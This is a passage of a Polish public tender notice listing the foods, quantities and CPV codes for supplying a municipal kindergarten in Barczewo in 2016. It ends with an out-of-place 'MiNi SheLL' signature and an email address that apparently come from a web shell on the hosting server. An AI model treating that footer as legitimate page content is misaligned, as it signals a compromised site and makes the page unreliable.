42.	Majonez słoik op.850g Skład: co najmniej 83% oleju rzepakowego.	szt	18
43.	Ogórek konserwowy w oryginalnych opakowaniach 0,9l słoik	Szt	40
44.	Kukurydza konserwowa puszka op.400g	Szt	40
45.	Szczaw krojony w oryginalnych opakowaniach waga co najmniej330g	szt	25
46.	Chrzan tarty słoik op.co najmniej170gz kwaskiem cytrynowym	Szt	25
47.	Groszek konserwowy w puszce w oryginalnych op.400g	Szt	30
48.	Papryka mielona słodka w oryginalnych op.16g	Szt	80
49.	Przyprawa Curry op.20g	Szt	30
50.	Przyprawa Kurkuma  op.10-20g	Szt	30
51.	Majeranek otarty waga co najmniej 6g	szt	80
52.	Wafle suche prostokątne waga co najmniej 146g	Szt	180
53.	Sól himalajska	kg	20
54.	Zioła prowansalskie w oryginalnych opakowaniach op.10g	szt	50
55.	Cukier waniliowy	szt	80
56.	Kwasek cytrynowyop.20g	Szt	65
57.	Musztarda słoik op.co najmniej 180g	szt	50
58.	Miód naturalny wielokwiatowy op.370g	Szt	300
59.	Ananas plastry puszka waga bez odcieku co najmniej 565g	szt	30
60.	Proszek do pieczenia	Szt 	10
61.	Syrop owocowy naturalny op.420 ml	L	100
62.	Bazylia suszona przyprawa	szt	40
63	Makrela w sosie pomidorowym bez warzyw op co najmniej 200g zawierające co najmniej 60% mięsa z ryb w 100g produktu gotowego do spożycia.	Szt	100
64.	Soki owocowo-warzywne naturalne 100% op.1000ml(np marchew,jabłko; marchew-banan)	L	300
65.	Cukier puder op.co najmniej 500g	Kg	10
66.	Tymianek suszony waga co najmniej10g	Szt	30
67.	Oregano suszone waga co najmniej 10g	Szt	30
68	Fasola czerwona w puszce waga co najmniej 400g	szt	120
69	Olej z pierwszego tłoczenia rzepakowy z dodatkami(czosnek,bazylia,pomidory)op.co najmniej0,25l	L	25
70	Soczewica czerwona połówki op.500-1000g	kg	30
71	Pomidory w puszce bez skórki( z otwieraczem) op.co najmniej 400g	szt	400
72	Kawa zbożowa sypana op.co najmniej 200g	szt	30
73	Ciecierzyca op.500-1000g	kg	20
74	Drożdże świeże	kg	5
75	Płatki jaglane błyskawiczne op.250-500g	kg	15
76	Brzoskwinie w puszce	szt	20
77	Gałka muszkatołowa mielona	szt	30
78	Kolendra suszona przyprawa	Szt
	20
79	Lubczyk suszony przyprawa	szt	20
80	Rozmaryn suszony przyprawa	szt	20
81	Cynamon mielony przyprawa	szt	20
82	Goździki przyprawa	szt	20
83	Sok owocowy jabłkowy naturalny 100% (zawartość cukru w 100g gotowego produktu max10g ) op.1000ml	L	200
			
84	Imbir mielony przyprawa	szt	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.60.00.00-4, 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 03.01.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> CZĘŚĆ 2. Zakup, dostawa i rozładunek  mięsa i jego przetworów dla Przedszkola Miejskiego w Barczew.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Karkówka surowa wieprzowa bez kości	Kg	220
2.	Łopatka wieprzowa surowa bez kości	Kg	600
3.	Wołowina surowa ligawa	Kg	170
4.	Szynka wieprzowa surowa bez kości,bez skóry	Kg	220
5.	Filet z indyka surowy	Kg	200
6.	Filet z kurczaka surowy	Kg	400
7.	Schab bez kości surowy wieprzowy	Kg	100
8.	Udka bez grzbietu z kurczaka surowe	Kg	250
9.	Antrykot wołowy surowy	Kg	20
10.	Żebra wołowe surowe	Kg	20
11.	Porcje rosołowe z kurczaka	Kg	30
12.	Wątróbka drobiowa surowa	Kg	15
13.	Parówki wp. cienkie o zwartości co najmniej71% mięsa wp.	Kg	45
14.	Łopatka wp. Pieczona skład:łopatka wp min.73%,woda,sól,naturalne przyprawy.	Kg	30
15.	Szynka wiejska o wyczuwalnym smaku i zapachu użytych przypraw,mięso wp.min.75%,sól,przyprawy naturalne,woda	kg	60
16.	Kiełbasa krakowska sucha .Wyrób w osłonce białkowej.Składniki:mięso wp.(100g produktu otrzymano z 112g mięsa wp.)Wyczuwalny smak i zapach użytych przypraw naturalnych.	kg	30
17.	Kiełbasa krakowska parzona baton.Kiełbasa gruboziarnista,wędzona i parzona.Mięso wp.min 63%,sól,woda,przyprawy naturalne wyczuwalne w smaku.	Kg	60
18.	Polędwica sopocka wp. klasa I .Mięso wp.(schab b/k) min.90%,woda,sól,przyprawy naturalne.	Kg	60
19.	Szynka wp.gotowana.kl.I.Mięso wieprzowe min 80%.woda,sól,przyprawy naturalne.	Kg	60
20.	Kiełbasa cienka wp.podsuszana o zawartości mięsa min.72%.	kg	80
21.	Filet wędzony z indyka o zawartości mięsa z indyka min 80%,woda ,sól,przyprawy naturalne wyczuwalne w smaku i zapachu.	Kg	80
22.	Ogonówka wędzona parzona.Mięso wp.min82%,woda,sól,przyprawy naturalne.	Kg	30
23	Smalec wp. kostka 200-250g	Kg	30
24	Kiełbasa szynkowa wp.baton,mięso wp min 71%,sól,woda,przyprawy naturalne.	kg	30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.11.21.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 03.01.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> CZĘŚĆ 3. Zakup, dostawa i rozładunek ziemniaków,warzyw,jarzyn,owoców, owoców tropikalnych,orzechów..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Ziemniaki 	kg	5000
2.	Marchew świeża korzeń	kg	450
3.	Pietruszka świeża korzeń	kg	150
4.	Cebula biała	kg	100
5.	Cebula czerwona	kg	60
6.	Seler świeży korzeń	kg	300
7.	Por świeży	kg	220
8.	Kapusta czerwona świeża	kg	150
9.	Pieczarki świeże 	kg	40
10.	Czosnek kraj pochodzenie polska głowka 	szt	100
11.	Szczypior świeży pęczek	szt	750
12.	Rzodkiewka pęczek	szt	750
13.	Rzodkiew biała świeża	Kg	60
14	Sałata lodowa ,pakowana główka	szt	240
15	Sałata  zielona świeża główka	Szt	270
16	Pomidory czerwone, świeże	kg	700
17	Ogórek św.szklarniowy	kg	350
18	Ogórek swieży,zielony gruntowy	kg	100
19	Ogórek kwaszony	Kg	30
20	Kapusta kwaszona biała	kg	95
21	Kapusta pekinska 	kg	100
22	Kapusta biała słodka  główka	kg	150
23	Papryka czerwona ,żółta,zielona	kg	120
24	Cytryna świeża	Kg	100
25	Jabłka świeże	kg	2500
26	Banany świeże	kg	900
27	Gruszki świeże	kg	300
28	kiwi	Kg	60
29	Mandarynki  świeże	kg	300
30	Winogrona zielone bezpestkowe	kg	180
31	Śliwka fioletowa duża	kg	60
32	Brzoskwinie	kg	40
33	Winogrona granatowe	kg	60
34	Koper zielony,świeży pęczek 100g	Szt	600
35	Natka pietruszki świeza pęczek  100g	szt	600
36	Burak czerwony świeży	Kg	280
37	Rodzynki op.co najmniej 100g-150g	kg	5
38	Orzechy włoskie łuskane op.co najmniej100g	kg	5
39	Fasola sucha średnia  op.400-1000g	Kg	25
40	Groch połówki op. 400-1000g	kg	25
41	Pietruszka suszona natka op.50-100g	kg	4
42	Włoszczyzna suszona op.100-200g	kg	4
43	Koper zielony suszony op 50-100g	kg	3
44	Pestki słonecznika op.50-150g	kg	8
45	Żurawina suszona op.250-500g	kg	8
46	Kalafior świeży w sezonie	szt	80
47	Brokuły świeze (w sezonie)	szt	80
48	Kapusta młoda( w sezonie)	kg	40
49	Młode ziemniaki(w sezonie)	kg	200
50	Truskawka św w sezonie	kg	120
51	Botwinka (w sezonie)	pęcz	80
52	Morele suszone	kg	5
53	Figi suszone	kg	5
	Cebulka suszona			3
54		kg	
55	Cukinia	kg	30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.20.00.00-3, 03.22.21.10-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 03.01.2016.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> CZĘŚĆ 4. Zakup, dostawa i rozładunek  mrożonek dla Przedszkola Miejskiego w Barczewie(ryby przetworzone,warzywa i owoce mrożone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Włoszczyzna4-składnikowa(marchew,por,seler,pietruszka)op.2000-2500g)	kg	800
2.	Mieszanka 7-składnikowa z kapustą brukselką op. 2000-2500g	kg	180
3.	Brokuły mrożone 450g-2500g	kg	400
4.	Kalafior mrożony op.450-2500g	kg	400
5	Fasolka szparagowa żółta cięta op.450-2500g	kg	150
6	Fasolka szparagowa zielona cieta op.450-2500g	kg	100
7	Szpinak mrożony mielony.op.450-2500g	Kg	80
8 	Groszek zielony mrożony op.450-2500g	kg	180
9	Barszcz ukraiński skład:burak (ćwikłowy,kapusta,fasola,marchew,pomidor,seler,cebula)op.450-2500g	kg	60
10	Mieszanka kompotowa 5-składnikowa z truskawką op.450-2500g 	Kg	400
11	Mieszanka kompotowa 5-składnikowa(ananas,porzeczka czerwona,porzeczka czarna,rabarbar,truskawka) lub równoważna	kg	500
12	Truskawka mrożona op.450-2500g	Kg	250
13	Bukiet warzyw (brokuł,kalafior,marchew)op.450-2500g	Kg	230
14	Bukiet warzyw (kalafior,fasola szparagowa,marchew,brukselka,groch zielony)lub równoważna op.450-2500g	kg	150
15	Marchew kostka op.450-2500g	kg	340
16	Marchew z groszkiem op.450-2500g	Kg	250
17	Wiśnia b)p op.450-2500g	Kg	100
18	Porzeczka czarna mrożona op.450-2500g	kg	80
19	Dorsz filet SHP	kg	250
20	Miruna filet SHP	kg	180
21	Morszczuk filet SHP	kg	250
22	Dynia mrożona	kg	30
23	Makrela wędzona	Kg	50
24	Włoszczyzna 3-składnikowa paski op.450-2500g	Kg	130
25	Ryba sola filet mrożona	kg	30
26	Kluski śląske op 400-2500g	kg	90
27	Mieszanka kompotowa z owoców leśnych op2000-2500g	kg	400
28	Dorada filet	kg	60.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0, 15.33.11.70-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 03.01.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> CZĘŚĆ 5. Zakup, dostawa i rozładunek produktów mleczarskich do Przedszkola Miejskiego w Barczewie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Mleko folia 2%op.1000ml	L	3740
2.	Mleko folia 3,2%	L	3740
3.	Mleko UHT op.1000ml 2%	L	300
4.	Mleko UHT op.1000ml 3,2%	L	300
5.	Masło ekstra zawierajace co najmniej 82% tłuszczu	kg	400
6.	Jogurt owocowy typu greckiego,waga op.125g o niskiej zawartości cukru,bez aromatów i barwników,bez syropu glukozowo-fruktozowego,zawartośc soli wynika wyłącznie z nauralnie występującego sodu.	szt	1200
7.	Serek homogenizowany wanilia op.co najmniej 135g	szt	360
8.	 Jogurt naturalny typu greckiego lub bałkańskiego  op.co najmniej 350g  zawierający nie więcej niż 0,12g sodu/soli w 100g gotowego do spożycia produktu	L	550
9.	Kefir  naturalny op.co najmniej350g zawierający nie więcej  niż  0,12g sodu/soli w 100g gotowego do spożycia produktu	L	 300
10.	Śmietana 12% op.co najmniej 400ml	L	200
11	Ser żółty  typu salami  (nie dopuszcza się produktu seropodobnego)	kg	45
12	Ser żółty typu gouda (nie dopuszcza się produktu seropodobnego)	kg	45
13	Śmietana 9% op 400g	L	200
14	Maślanka naturalna1000ml	L	60
15	Twaróg krajanka półtłusty	kg	500
16	Serek ziarnisty wiejski naturalny op.150-200g	szt	300
17	Jogurt naturalny 2% tłuszczu op.150g	Szt 	900.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 03.01.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> CZĘŚĆ 6. Zakup, dostawa i rozładunek pieczywa dla Przedszkola Miejskiego w Barczewie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Chleb pszenno- żytni krojony foliowany waga co najmniej400-500g	Szt.	900
2	Chleb żytni pełnoziarnisty krojony foliowany waga co najmniej  400g	szt	550
3	Bułki kajzerki waga co najmniej 50g	szt	1000
4	Bułka grahamka waga co najmniej 50 g	szt	2000
5	Chleb wieloziarnisty zawartość minimum 3-ziarna(siemię lniane,słonecznik obowiązkowo,pozostałe dowolne) waga co najmniej 400-500g	szt	500
6	Ciasto drożdżowe z niską zawartością cukru	kg	150
7	Chałka zdobna co najmniej 300g	szt	220
8	Chleb razowy waga min.400g krojony,foliowany	szt	750
9	Rogaliki krucho -drożdżowe nadziewane(z niska zawartością cukru)	kg	150
10	Bułki  z ziarnami dyni waga co najmniej 50g	szt	800
11	Bułki czerstwe  waga co najmniej waga 50g	szt	900
12	Bułka tarta	kg	80
13	Bułka z ziarnami  różnymi waga min.50g	szt	600
14	Chleb wiejski waga min.400g	szt	300
15	Rogale z makiem waga co najmniej 50g	szt	1000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 03.01.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com